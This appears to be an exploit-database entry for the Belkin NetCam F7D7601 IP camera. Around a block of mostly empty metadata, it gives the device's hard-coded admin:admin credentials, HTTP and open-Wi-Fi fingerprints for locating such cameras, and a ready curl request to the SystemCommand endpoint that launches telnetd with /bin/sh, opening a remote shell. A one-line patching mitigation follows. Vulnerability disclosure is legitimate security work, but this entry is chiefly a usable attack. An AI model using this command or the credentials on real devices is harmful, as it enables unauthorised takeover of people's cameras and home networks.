vendor:
NetCam F7D7601
by:
Wadeek
7,5
CVSS
HIGH
Remote Command Execution
N/A
CWE
Product Name: NetCam F7D7601
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017
Belkin NetCam F7D7601 | Remote Command Execution
UnsetupMode == [0] Hard-coded password admin:admin - SetupMode == [1] Network Fingerprinting: 80/tcp open http HTTP/1.1 401 Unauthorized Server: Camera Web Server WWW-Authenticate: Basic realm="Camera Web Server" <title>Document Error: Unauthorized</title> <h2>Access Error: Unauthorized</h2> <p>Access to this document requires a User ID</p> Wireless Fingerprinting: ESSID:"NetCamXXXX" Encryption key:off Address: C0:56:27 Remote Command Execution: :~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh'
Mitigation:
Ensure that the device is running the latest firmware version and that all security patches are applied.